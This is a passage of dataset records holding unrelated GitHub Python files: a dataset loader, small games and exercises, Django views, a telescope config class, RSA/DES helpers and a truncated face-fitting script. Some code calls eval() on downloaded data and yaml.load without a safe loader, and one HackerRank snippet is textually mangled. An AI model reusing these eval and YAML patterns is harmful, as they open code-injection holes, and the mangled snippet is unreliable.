urllib.request.urlretrieve(meta_url, meta_temp.name)\n meta_temp.seek(0)\n with GzipFile(meta_temp.name, \"rb\") as ifs:\n zf.writestr(\"amazon-music/music-meta.json\", ifs.read())\n\n def read_interaction(self) -> pd.DataFrame:\n return pd.read_csv(\n self._read_as_istream(\"amazon-music/ratings.csv\"),\n header=None,\n names=[\"user_id\", \"music_id\", \"rating\", \"timestamp\"],\n )\n\n def read_metadata(self) -> pd.DataFrame:\n results = []\n for l in self._read_as_istream(\"amazon-music/music-meta.json\"):\n meta = eval(l.decode(\"utf-8\"))\n results.append(\n (\n meta[\"asin\"],\n meta.pop(\"title\", None),\n meta.pop(\"price\", None),\n meta.pop(\"categories\", [None])[0],\n )\n )\n return pd.DataFrame(\n results, columns=[\"music_id\", \"title\", \"price\", \"categories\"]\n ).set_index(\"music_id\")\n","repo_name":"tohtsky/irspack","sub_path":"src/irspack/dataset/amazon_music.py","file_name":"amazon_music.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"17043675220","text":"\r\nimport random\r\n\r\nprint(\"I’m thinking of a number in the range 0-50. You have five tries to guess it.\")\r\nrandomNumber = random.randrange(0,50)\r\nguess = False\r\nguessNumber = 0\r\n\r\n\r\nwhile guess == False:\r\n userGuess = int(input(\"Guess {}: \".format(guessNumber)))\r\n if guessNumber == 5:\r\n print (\"Game over! The correct answer was {}.\".format(randomNumber))\r\n break\r\n if userGuess == randomNumber:\r\n guess = True\r\n print(\"You are right! I was thinking of {}!\".format(randomNumber))\r\n elif userGuess > randomNumber:\r\n print(\"{} is too high.\".format(userGuess))\r\n guessNumber += 1\r\n elif userGuess < randomNumber:\r\n print(\"{} is too low.\".format(userGuess))\r\n guessNumber += 1\r\n \r\n","repo_name":"jibraelp/python-practice","sub_path":"pythonGuessingGame.py","file_name":"pythonGuessingGame.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4216504188","text":"from django.core.management.commands import ( # type: ignore[attr-defined]\n makemigrations,\n)\n\nfrom psqlextra.backend.migrations import postgres_patched_migrations\n\n\nclass Command(makemigrations.Command):\n help = \"Creates new PostgreSQL specific migration(s) for apps.\"\n\n def handle(self, *app_labels, **options):\n with postgres_patched_migrations():\n return super().handle(*app_labels, **options)\n","repo_name":"SectorLabs/django-postgres-extra","sub_path":"psqlextra/management/commands/pgmakemigrations.py","file_name":"pgmakemigrations.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":647,"dataset":"github-code","pt":"72"} +{"seq_id":"33732647637","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport argparse\nfrom . import Pitman, PODCASTS\n\n\ndef stype(bytestring):\n unicode_string = bytestring.decode(sys.getfilesystemencoding())\n return unicode_string\n\n\ndef parse_options():\n parser = argparse.ArgumentParser(description='Dig for your favored '\n 'Podcast.')\n parser.add_argument('-p', '--podcast', type=stype,\n choices=PODCASTS.keys(), default='CLR')\n subparsers = parser.add_subparsers()\n\n parser_show = subparsers.add_parser('show')\n parser_show.set_defaults(show=True)\n parser_show.add_argument('-l', '--limit', type=int, default=0,\n help='limit show to last N episodes')\n parser_show.add_argument('-v', '--verbose', action=\"store_true\",\n help='verbose output')\n\n parser_search = subparsers.add_parser('search')\n parser_search.set_defaults(search=True)\n parser_search.add_argument('artist', type=stype, nargs='+',\n help='search for artist')\n\n parser_get = subparsers.add_parser('get')\n parser_get.set_defaults(get=True)\n parser_get.add_argument('episode', type=int, nargs='+',\n help='download episode')\n\n return parser.parse_args()\n\n\ndef run(args):\n pitman = Pitman(args.podcast)\n pitman.parse(args.podcast)\n if hasattr(args, 'show'):\n pitman.show(args.limit, args.verbose)\n elif hasattr(args, 'search'):\n pitman.search(args.artist)\n elif hasattr(args, 'get'):\n pitman.get(args.episode)\n\n\ndef main():\n args = parse_options()\n run(args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tschaefer/pitman","sub_path":"pitman/pitman.py","file_name":"pitman.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21974719413","text":"#!/bin/python3\n#https://www.hackerrank.com/challenges/hackerland-radio-transmitters\n\nimport sys\n\n\nn,k = input().strip().split(' ')\nn,k = [int(n),int(k)]\nx = sorted([int(x_temp) for x_temp in input().strip().split(' ')])\n\nno_of_transmitters = 0\ni = 0 #index\npointer = 0\n\nwhile i x[i] + k:\n# pointer = j-1 +\n# transmitter += 1 # transmitter at x[j-1]\n","repo_name":"pyaf/hackerrank","sub_path":"algorithm/challenges/hackerland-radio-transmitters.py","file_name":"hackerland-radio-transmitters.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20830156696","text":"'''\nAuthor: Kamran Akram \nDate: 12/11/18\n'''\nimport json\nimport spacy\n\n\nclass UrduGenderAnalyzer:\n\n @staticmethod\n def parse_tagged_sentence(s):\n tws = []\n isP = True\n isW = False\n p = w = \"\"\n for c in s:\n if c is '|':\n isP = not isP\n isW = not isW\n elif c is \" \":\n isW = not isW\n isP = not isP\n tw = {'p': p,'w': w}\n tws.append(tw)\n p = w = \"\"\n else:\n if isP:\n p += c\n elif isW:\n w += c\n return tws\n\n @staticmethod\n def analyze_gender(s):\n spc = spacy.load('en_core_web_sm')\n doc = spc(s)\n sub = None\n for token in doc:\n if token.dep_ == \"nsubj\":\n sub = token.lower_\n break\n if sub is None:\n print(\"Unable to find subject in sentence.\")\n return None\n with open('names-dataset.json', encoding='utf-8') as f:\n d = json.load(f)\n g = None\n for ns in d:\n if sub == ns.get('name').lower():\n g = ns.get('gender')\n return g\n print(\"Subject is not in dataset.\")\n return None\n\n\n\n\n","repo_name":"kamii1000/urdu-trans-nlp","sub_path":"UrduGenderAnalyzer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7701875501","text":"from django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom tagging.models import TaggedItem\nfrom django.views.decorators.csrf import csrf_exempt\nfrom models import *\nimport itertools\nimport json\n\n# Create your views here.\ndef index (request):\n\tt = get_template('index.html')\n\thtml = t.render(Context({}))\n\treturn HttpResponse(html)\n\ndef learn (request):\n\tt = get_template('learn.html')\n\thtml = t.render(Context({}))\n\treturn HttpResponse(html)\n\ndef ingredient (request, id_num):\n\tt = get_template('ingredient.html')\n\tingredient_object = Ingredient.objects.get(id=id_num)\n\n\tsub = [sub.dishes.all() for sub in ingredient_object.substitutee.all()]\n\tdishes = list(itertools.chain.from_iterable(sub))\n\tdishes = dishes + list(ingredient_object.dishes.all())\n\tdishes = sorted(list(set(dishes))) # remove duplices\n\n\tc = Context({'ingred':ingredient_object,'dishes':dishes})\n\thtml = t.render(c)\n\treturn HttpResponse(html)\n\ndef dish (request, id_num):\n\tt = get_template('dish.html')\n\tdish_object = Dish.objects.get(id=id_num)\n\n\tingredients = dish_object.ingredients.all()\n\tsubstitutes = [list(ingred.substitutes.all()) for ingred in ingredients]\n\tsubstitutes = list(itertools.chain.from_iterable(substitutes))\n\tsubstitutes = sorted(list(set(substitutes)))\n\n\tc = Context({'dish':dish_object, 'subs':substitutes, 'ingredients':ingredients})\n\thtml = t.render(c)\n\treturn HttpResponse(html)\n\n@csrf_exempt\ndef subset (request):\n\t\"\"\"\n\tIncludes all dishes if 'dishAll' True, else union of 'dishFilters' string. Same for ingredients.\n\t\"\"\"\n\n\tdata = json.loads(request.body)\n\n\tREQUIRED_FIELDS = ['dishAll','ingredientAll','dishFilters','ingredientFilters']\n\n\tif sum([1 if e in data else 0 for e in REQUIRED_FIELDS]) != len(REQUIRED_FIELDS) or \\\n\t\trequest.method != 'POST':\n\t\treturn HttpResponse(status=400)\n\n\titems = list()\n\n\tif data['dishAll'] == True:\n\t\titems.extend(list(Dish.objects.all()))\n\telse:\n\t\titems.extend(list(TaggedItem.objects.get_union_by_model(Dish, data['dishFilters'])))\n\n\tif data['ingredientAll'] == True:\n\t\titems.extend(list(Ingredient.objects.all()))\n\telse:\n\t\titems.extend(list(TaggedItem.objects.get_union_by_model(Ingredient, data['ingredientFilters'])))\n\n\t# identifier, name, image, vt, vg, classes, section\n\tresponse = []\n\n\tfor item in items:\n\t\t# identifier\n\t\tif type(item) == Dish:\n\t\t\tidentifier = 'D'\n\t\telif type(item) == Ingredient:\n\t\t\tidentifier = 'I'\n\t\tidentifier += str(item.id)\n\n\t\tresponse.append({\n\t\t\t\"identifier\" : identifier,\n\t\t\t\"name\" : item.name,\n\t\t\t\"image\" : item.image,\n\t\t\t\"vt\" : item.isVegetarian,\n\t\t\t\"vg\" : item.isVegan,\n\t\t\t\"classes\" : [],\n\t\t\t})\n\n\treturn HttpResponse(json.dumps(response), content_type=\"application/json\", status=200)\n\n@csrf_exempt\ndef list_all (request):\n\t\"\"\"\n\tReturns a mapping of all items and their identifiers.\n\t\"\"\"\n\n\tif request.method != 'GET':\n\t\treturn HttpResponse(status=400)\n\n\tresponse = {}\n\n\tfor dish in Dish.objects.all():\n\t\tresponse[dish.name] = 'D' + str(dish.id)\n\n\tfor ingredient in Ingredient.objects.all():\n\t\tresponse[ingredient.name] = 'I' + str(ingredient.id)\n\n\treturn HttpResponse(json.dumps(response), content_type=\"application/json\", status=200)\n","repo_name":"aboolean/vSafe","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32159140294","text":"from itertools import combinations\r\na=[]\r\nL,C=map(int, input().split())\r\npwd=sorted(list(input().split()))\r\npos=combinations(pwd, L)\r\nm=['a', 'e', 'i', 'o', 'u']\r\nfor i in pos:\r\n mo=0\r\n ja=0\r\n for j in range(len(i)):\r\n if i[j] in m:\r\n mo += 1\r\n else:\r\n ja += 1\r\n if mo >= 1 and ja >= 2:\r\n print(''.join(i))","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Gold/1759. 암호 만들기/암호 만들기.py","file_name":"암호 만들기.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32063239022","text":"from os import path\nfrom astropy.coordinates import EarthLocation\nimport yaml\nimport numpy as np\nfrom prose import CONFIG\nimport astropy.units as u\n\n\ndef str_to_astropy_unit(unit_string):\n return u.__dict__[unit_string]\n\n\nclass Telescope:\n \"\"\"Object containing telescope information.\n\n see :ref:`telescope-config` page for more info\n\n Parameters\n ----------\n telescope_file : dict or str, optional\n telescope dict or description file, by default None which load a \"default\" telescope\n\n \"\"\"\n def __init__(self, telescope_file=None):\n\n # Keywords\n self.keyword_object = \"OBJECT\"\n self.keyword_image_type = \"IMAGETYP\"\n self.keyword_light_images = \"light\"\n self.keyword_dark_images = \"dark\"\n self.keyword_flat_images = \"flat\"\n self.keyword_bias_images = \"bias\"\n self.keyword_observation_date = \"DATE-OBS\"\n self.keyword_exposure_time = \"EXPTIME\"\n self.keyword_filter = \"FILTER\"\n self.keyword_observatory = \"TELESCOP\"\n self.keyword_airmass = \"AIRMASS\"\n self.keyword_fwhm = \"FWHM\"\n self.keyword_seeing = \"SEEING\"\n self.keyword_ra = \"RA\"\n self.keyword_dec = \"DEC\"\n self.ra_unit = \"deg\"\n self.dec_unit = \"deg\"\n self.keyword_julian_date = \"JD\"\n self.keyword_flip = \"PIERSIDE\"\n\n # Specs\n self.name = \"Unknown\"\n self.trimming = (0, 0)\n self.read_noise = 9\n self.gain = 1\n self.altitude = 2000\n self.diameter = 100\n self.pixel_scale = None\n self.latlong = [None, None]\n\n if telescope_file is not None:\n success = self.load(telescope_file)\n if success:\n CONFIG.save_telescope_file(telescope_file)\n\n def __getattribute__(self, name):\n if name == \"ra_unit\":\n return str_to_astropy_unit(self.__dict__[name])\n elif name == \"dec_unit\":\n return str_to_astropy_unit(self.__dict__[name])\n return super(Telescope, self).__getattribute__(name)\n\n def load(self, file):\n if isinstance(file, str) and path.exists(file):\n with open(file, \"r\") as f:\n telescope = yaml.load(f)\n elif isinstance(file, dict):\n telescope = file\n elif file is None:\n return False\n else:\n raise ValueError(\"file must be path or dict\")\n \n self.__dict__.update(telescope)\n\n if telescope is None:\n return False\n else:\n return True\n \n def is_new(self):\n return not self.name.lower() in CONFIG.telescopes_dict()\n\n @property\n def earth_location(self):\n return EarthLocation(*self.latlong, self.altitude)\n\n def error(self, signal, area, sky, exposure, airmass=None, scinfac=0.09):\n _signal = signal.copy() \n _squarred_error = _signal + area * (self.read_noise ** 2 + (self.gain / 2) ** 2 + sky)\n\n if airmass is not None:\n scintillation = (\n scinfac\n * np.power(self.diameter, -0.6666)\n * np.power(airmass, 1.75)\n * np.exp(-self.altitude / 8000.0)\n ) / np.sqrt(2 * exposure)\n\n _squarred_error += np.power(signal * scintillation, 2)\n\n return np.sqrt(_squarred_error)\n","repo_name":"franpoz/prose","sub_path":"prose/telescope.py","file_name":"telescope.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"35029709059","text":"from flask import Flask,request,render_template\nimport numpy as np\nimport ast\nimport pickle\napp = Flask(__name__)\n\n# initial route\n@app.route('/')\ndef home():\n return render_template('0.html')\n\n\n@app.route('/result', methods=['GET', 'POST'])\ndef hasil():\n if request.method == 'POST':\n data = request.form\n Radius = float(data['Radius Mean'])\n Texture = float(data['Texture Mean'])\n Perimeter = float(data['Perimeter Mean'])\n Area = float(data['Area Mean'])\n Smoothness = float(data['Smoothness Mean'])\n Compactness = float(data['Compactness Mean'])\n Concavity = float(data['Concavity Mean'])\n Concave = float(data['Concave Points Mean'])\n Symmetri = float(data['Symmetry Mean'])\n\n data_new = [Radius,Texture,Perimeter,Area,Smoothness,Compactness,Concavity,Concave,Symmetri]\n\n data_new = np.array(data_new)\n\n data1 = scaler.transform([data_new])\n\n # print(data1)\n # print(data_new)\n # return 'ok'\n\n\n x = model.predict(data1)[0]\n\n # print(data_new)\n return render_template('1.html',x=x)\n # 'Prediksi = ' + str(x)\n\n\nif __name__ == '__main__':\n model = pickle.load(open(\"MachineModel\", 'rb'))\n scaler = pickle.load(open(\"scal\", 'rb'))\n app.run(debug=True, port=1234)\n","repo_name":"fadelasyahid/Deploy_Machine_Learning_dengan_Flask","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26902850711","text":"import openpyxl\nimport os\nfrom pathlib import Path\nimport glob\n\nsourceDir = 'sources'\n\nprint(f'finding xlsx files in {sourceDir}')\n\n# get all excel files in sources\nxlFiles = glob.glob(f'{sourceDir}/**/*.xlsx', recursive=True)\n\ndef xlsx2csv(xlFile):\n # convert to csv with parent dir\n xlFile = Path(xlFile)\n\n # get data from excel file\n xlsx = openpyxl.load_workbook(xlFile, data_only=True)\n sheet = xlsx.active\n data = sheet.rows\n\n # create/open dir and create csv\n outDir = Path.cwd() / xlFile.parts[-2].split(' ')[0] # strip the tibetan with split\n outDir.mkdir(parents=True, exist_ok=True)\n outStem = xlFile.stem\n outPath = outDir / f'{outStem}.csv'\n\n # write data in csv\n csv = open(outPath, \"w+\", encoding='utf-8')\n for row in data:\n l = list(row)\n for i in range(len(l)):\n if i == len(l) - 1:\n csv.write(str(l[i].value))\n else:\n csv.write(str(l[i].value) + ',')\n csv.write('\\n')\n csv.close()\n\n\nfor xl in xlFiles:\n print(f'converting: {xl}')\n xlsx2csv(xl)\n","repo_name":"Esukhia/tengyur-pagination","sub_path":"xlsx2csv.py","file_name":"xlsx2csv.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28044529565","text":"from datetime import datetime, timedelta\n\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.models import AnonymousUser\nfrom knox.models import AuthToken\n\nfrom v1.api.appview import AppApiView\nfrom v1.core.exceptions import ServerError\nfrom v1.core.validators import DevicePushToken\nfrom v1.core.reqsponse import Reqsponse\nfrom v1.user.models import User\n\nfrom ..models import TokenExtended\n\n\nclass TokenCurrent(AppApiView):\n\n def patch(self, request, format=None):\n \"\"\"\n Изменение данных текущего токена.\n \"\"\"\n param_titles = {\n 'push_token': _(u'Токен push-уведомлений'),\n 'lang': _(u'Язык'),\n }\n req = Reqsponse(request, param_titles)\n\n # Получение и валидация данных\n\n push_token = req.get_str('push_token', DevicePushToken)\n lang = req.get_str('lang', AppLang)\n\n # Обработка\n\n token = request.auth\n if token is None:\n raise ServerError(msgDev='Не удаётся получить токен из системы')\n\n if lang:\n token.ex.lang = lang\n\n user = request.user\n if user is not None and not user.is_guest:\n if push_token:\n token.ex.push_token = push_token\n\n token.ex.save()\n\n return req.output({})\n\n def delete(self, request, format=None):\n \"\"\"\n Удаление текущего токена.\n \"\"\"\n req = Reqsponse(request)\n\n token = request.auth\n if token is None:\n raise ServerError(msgDev='Не удаётся получить токен из системы')\n\n token.delete()\n\n return req.output({})\n","repo_name":"MasterYuri/Python-Django-Example","sub_path":"modules/session/views/token_current.py","file_name":"token_current.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7615359533","text":"# coding:utf-8\n\nfrom Crypto import Signature\nfrom Crypto.Cipher import PKCS1_v1_5 as PKCS1_v1_5_Cipher\nfrom Crypto.Hash import SHA, MD5, SHA256\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_v1_5\nfrom Crypto.Util import number\nfrom Crypto.Util._number_new import ceil_div\nfrom xml.dom.minidom import parseString\nimport M2Crypto\nimport Crypto\nimport base64\nimport binascii\nimport os\nimport re\n\nprivate_key_tpl = '''-----BEGIN PRIVATE KEY-----\n%s\n-----END PRIVATE KEY-----\n'''\n\npublic_key_tpl = '''-----BEGIN PUBLIC KEY-----\n%s\n-----END PUBLIC KEY-----'''\n\n\ndef ensure_utf8(s):\n if isinstance(s, str):\n return s.encode('utf8')\n return s\n\n\ndef decode_base64(data):\n \"\"\"Decode base64, padding being optional.\n\n :param data: Base64 data as an ASCII byte string\n :returns: The decoded byte string.\n\n \"\"\"\n missing_padding = 4 - len(data) % 4\n if missing_padding:\n data += b'=' * missing_padding\n return base64.decodestring(data)\n\n\ndef base64ToString(s):\n return decode_base64(s)\n return base64.decodestring(s)\n try:\n return base64.b64decode(s)\n except binascii.Error as e:\n raise SyntaxError(e)\n except binascii.Incomplete as e:\n raise SyntaxError(e)\n\n\ndef stringToBase64(s):\n return base64.encodestring(s).replace(\"\\n\", \"\")\n\n\ndef decrypt_with_rsa(msg, key):\n '''\n msg必须采用base64编码, 注意: base64编码的数据经过URLDecoder处理之后,可能不正确,其中的+会变成' '\n '''\n msg = base64ToString(msg)\n key = RSA.importKey(key)\n cipher = PKCS1_v1_5_Cipher.new(key)\n\n modBits = number.size(key.n)\n k = ceil_div(modBits, 8) # Convert from bits to bytes\n print(\"K: \", k)\n\n msglen = len(msg)\n msg_encryted = \"\"\n start_idx = 0\n # 处理过长的加密\n while msglen > 0:\n len1 = min([msglen, k])\n cleartext = cipher.decrypt(msg[start_idx: (start_idx + len1)], \"\")\n msg_encryted = msg_encryted + cleartext\n start_idx = start_idx + len1\n msglen = msglen - len1\n return msg_encryted\n\n\ndef encrypt_with_rsa(msg, key):\n '''\n msg必须采用utf8编码\n '''\n msg = ensure_utf8(msg)\n\n key = RSA.importKey(key)\n cipher = PKCS1_v1_5_Cipher.new(key)\n\n modBits = number.size(key.n)\n k = ceil_div(modBits, 8) - 28 # 11 # Convert from bits to bytes\n print(\"K: \", k)\n\n msglen = len(msg)\n msg_encryted = \"\"\n start_idx = 0\n # 处理过长的加密\n while msglen > 0:\n len1 = min([msglen, k])\n encrypt = cipher.encrypt(msg[start_idx: (start_idx + len1)])\n msg_encryted = msg_encryted + encrypt\n start_idx = start_idx + len1\n msglen = msglen - len1\n return stringToBase64(msg_encryted)\n\n\ndef check_with_rsa(msg, signature, key, method=\"SHA\"):\n '''\n 使用当前文件中定义的_public_rsa_key来验证签名是否正确\n '''\n signature = base64ToString(signature)\n key = RSA.importKey(key)\n if method == \"SHA\":\n h = SHA.new(msg)\n elif method == \"SHA256\":\n h = SHA256.new(msg)\n elif method == \"MD5\":\n h = MD5.new(msg)\n else:\n h = SHA.new(msg)\n verifier = PKCS1_v1_5.new(key)\n\n return verifier.verify(h, signature)\n\n\ndef sign_with_rsa(msg, key, method=\"SHA\"):\n '''\n 将msg使用当前文件中定义的_private_rsa_key来签名, 返回base64编码的字符串\n '''\n key = RSA.importKey(key)\n if method == \"SHA\":\n h = SHA.new(msg)\n elif method == \"SHA256\":\n h = SHA256.new(msg)\n elif method == \"MD5\":\n h = MD5.new(msg)\n else:\n h = SHA.new(msg)\n signer = PKCS1_v1_5.new(key)\n signature = signer.sign(h)\n signature = stringToBase64(signature)\n return signature\n\n\ndef split_rsa_key(key):\n key = str(key)\n return ''.join([('%s\\n' % s) if ((i + 1) % 64 == 0) else s for i, s in enumerate(key)])\n\n\ndef get_format_pubkey(key):\n key = re.sub('\\s', '', key)\n pub_key = split_rsa_key(key)\n return public_key_tpl % pub_key\n\n\n# 将公钥字符串转为m2c的对象\ndef get_m2c_pub(pub_string):\n return M2Crypto.RSA.load_pub_key_bio(M2Crypto.BIO.MemoryBuffer(pub_string))\n\n\n# 公钥解密数据\ndef decrypt(data, m2c_pub, ilen=128):\n _maxlength = ilen\n data = data.decode(\"base64\")\n l_dstr = \"\"\n while len(data) > 0:\n s = data[:_maxlength]\n l_dstr += m2c_pub.public_decrypt(s, M2Crypto.RSA.pkcs1_padding)\n data = data[_maxlength:]\n return l_dstr\n\n\n# 公钥签名认证\ndef pub_verify(data, sign, m2c_pub):\n m = M2Crypto.EVP.MessageDigest('sha1')\n m.update(data)\n digest = m.final()\n sign = sign.decode(\"base64\")\n try:\n return m2c_pub.verify(digest, sign, algo='sha1')\n except:\n return False\n\n\nfrom pyDes import des, CBC, PAD_PKCS5\n\n\ndef DesEncrypt(text, Des_Key):\n Des_IV = \"12345678\" # 自定IV向量\n k = des(Des_Key, mode=CBC, IV=Des_IV, pad=None, padmode=PAD_PKCS5)\n EncryptStr = k.encrypt(text)\n return base64.b64encode(EncryptStr) # 转base64编码返回\n\n\ndef DesDecrypt(text, Des_Key):\n Des_IV = \"12345678\" # 自定IV向量\n text = base64.b64decode(text)\n k = des(Des_Key, mode=CBC, IV=Des_IV, pad=None, padmode=PAD_PKCS5)\n return k.decrypt(text)\n","repo_name":"xzregg/djmyframework","sub_path":"djmyframework/framework/utils/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":5242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28483690894","text":"# https://leetcode.com/problems/island-perimeter/\n\nclass Solution:\n def islandPerimeter(self, grid: List[List[int]]) -> int:\n inBound = lambda r, c: 0 <= r < len(grid) and 0 <= c < len(grid[row])\n neighbors = lambda r, c: [(r,c+1), (r,c-1), (r+1,c), (r-1,c)]\n perimeter = 0\n \n for row in range(len(grid)):\n for col in range(len(grid[0])):\n if grid[row][col] == 1:\n for r, c in neighbors(row, col):\n if not inBound(r, c) or grid[r][c] == 0:\n perimeter += 1\n \n return perimeter\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_45/island-perimeter.py","file_name":"island-perimeter.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74541069992","text":"import igraph\nimport pyarrow.parquet as pq\nimport numpy as np\nimport fire\n\ndef arrow_to_graph(path):\n df = pq.read_table(path).to_pandas()#.sort_values(\"mutationId\")\n vertex_mapping = dict( (mutationId, vertexId) for vertexId, mutationId in enumerate(df[\"mutationId\"]))\n is_root = np.array(df[\"ancestors\"].map(lambda x: len(x))) == 1\n graph = igraph.Graph()\n graph.add_vertices( len(vertex_mapping))\n links = list(zip(\n (vertex_mapping[x[-2]] for x in df[\"ancestors\"][~is_root]),\n (vertex_mapping[x] for x in df[\"mutationId\"][~is_root])\n ))\n graph.add_edges(links)\n graph.vs[\"mutationId\"] = df[\"mutationId\"]\n graph.vs[\"type_count\"] = df[\"typeCount\"]\n graph.vs[\"mutation_count\"] = df[\"mutationCount\"]\n graph.vs[vertex_mapping[1]]\n roots = np.where(is_root)\n return graph, roots[0]\n \ndef make_visual_style(graph):\n visual_style = {}\n visual_style[\"vertex_size\"] = (np.array(graph.vs[\"type_count\"])+1)**(1/4)\n visual_style[\"vertex_label\"] = graph.vs[\"mutationId\"]\n visual_style[\"margin\"] = 100\n return visual_style\n \ndef mutation_tree_plot(data_path, output_path):\n g, roots = arrow_to_graph(data_path)\n \n #g_layout = g.layout_reingold_tilford(root=[int(x) for x in roots])\n #visual_style = make_visual_style(g)\n\n #_ = igraph.plot(g, \n # output_path, \n # layout=g_layout, \n # inline=False, \n # bbox=(3840,1080), \n # **visual_style)\n \n h = g.subgraph( g.vs.select(mutation_count_gt=100000) )\n h_visual_style = make_visual_style(h)\n h_layout = h.layout_reingold_tilford(\"OUT\")\n\n _ = igraph.plot(h, \n output_path, \n layout=h_layout, \n inline=False, \n bbox=(3840,1080), \n **h_visual_style) \n \nif __name__ == \"__main__\":\n fire.Fire(mutation_tree_plot)","repo_name":"tozanski/SimBaD-analyzer","sub_path":"python/mutation_tree_plot.py","file_name":"mutation_tree_plot.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42697338951","text":"\"\"\"estimate facial geometry latent parameters α,δ and object transformation ω, t for a specific 2D image with a human face using Energy minimization.\"\"\"\nimport sys\nimport os\nimport dlib\nimport glob\nimport numpy as np\nfrom tqdm import tqdm, trange\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom data_def import Mesh\n\nfrom landmarks import file_landmarks, plot_landmarks\nfrom utils import load_data, load_landmarks, reconstruct_face\n# functions the same as their numpy versions\nfrom pinhole_camera import normalize, from_homogenous\n\nNEAR = torch.tensor([300.0])\nFAR = torch.tensor([2000.0])\nFOVY = torch.tensor([0.5])\nCAMERA_T = torch.tensor([0.0, 0.0, -400.0])\n\ndef to_homogenous(x):\n ones = torch.ones((x.shape[0], 1))\n return torch.cat((x.float(), ones), dim=1)\n\ndef apply_transform(x, M):\n return from_homogenous(torch.mm(M, to_homogenous(x).t()).t())\n\ndef construct_V(cx, cy):\n V = torch.tensor([[ cx, 0.0, 0.0, cx],\n [0.0, -cy, 0.0, cy],\n [0.0, 0.0, 0.5, 0.5],\n [0.0, 0.0, 0.0, 1.0]])\n return V\n\ndef construct_P(near, far, fovy, aspect_ratio):\n top = torch.tan(fovy / 2.0) * near\n right = top * aspect_ratio\n left = -right\n bottom = -top\n near_2 = 2 * near\n P = torch.tensor([\n [near_2, 0.0, right + left, 0.0],\n [0.0, near_2, top + bottom, 0.0],\n [0.0, 0.0, -(far + near), -near_2 * far],\n [0.0, 0.0, -1.0, 0.0],\n ])\n P /= torch.tensor([right - left, top - bottom, far - near, 1.0]).reshape(-1, 1)\n return P\n\ndef construct_R(theta_x, theta_y, theta_z):\n to_rad = lambda theta: theta * np.pi / 180.0\n theta_x = to_rad(theta_x)\n theta_y = to_rad(theta_y)\n theta_z = to_rad(theta_z)\n sin_x, cos_x = torch.sin(theta_x), torch.cos(theta_x)\n sin_y, cos_y = torch.sin(theta_y), torch.cos(theta_y)\n sin_z, cos_z = torch.sin(theta_z), torch.cos(theta_z)\n R_x = torch.tensor([\n [1., 0., 0.],\n [0., cos_x, -sin_x],\n [0., sin_x, cos_x],\n ])\n R_y = torch.tensor([\n [cos_y, 0., sin_y],\n [0., 1., 0.],\n [-sin_y, 0., cos_y],\n ])\n R_z = torch.tensor([\n [cos_z, -sin_z, 0.],\n [sin_z, cos_z, 0.],\n [0., 0., 1.],\n ])\n # 3x3\n R = torch.mm(R_z, torch.mm(R_y, R_x))\n # 4x4: extra zeroes\n R = torch.cat((torch.cat((R, torch.tensor([[0., 0., 0.]]).t()), dim=1), torch.tensor([[0., 0., 0., 1.]])), dim=0)\n return R\n\ndef construct_T(x, y, z):\n T = torch.eye(4)\n T = torch.cat((T[:,:-1], to_homogenous(torch.tensor([[x, y, z]])).t()), dim=1)\n return T\n\ndef construct_obj_to_cam(omega, t, resolution=(1.0, 1.0)):\n aspect_ratio = resolution[0] / float(resolution[1])\n T = construct_T(*list(t.t()))\n R = construct_R(*list(omega.t()))\n model_mat = torch.mm(T, R)\n view_mat = construct_T(*CAMERA_T)\n projection_mat = construct_P(NEAR, FAR, FOVY, aspect_ratio)\n viewport_mat = construct_V(resolution[0] / 2.0, resolution[1] / 2.0)\n M = torch.mm(viewport_mat, torch.mm(projection_mat, torch.mm(view_mat, model_mat)))\n return M\n\n\n\n\n# def rotation_matrix_y(y_deg):\n# \"\"\"Get the Y rotation matrix (https://bit.ly/2PQ8glW) for a given rotation angle (in degrees).\n# Assuming object translation to be 0.\n# \"\"\"\n# y_rad = y_deg / 180 * np.pi \n# R = 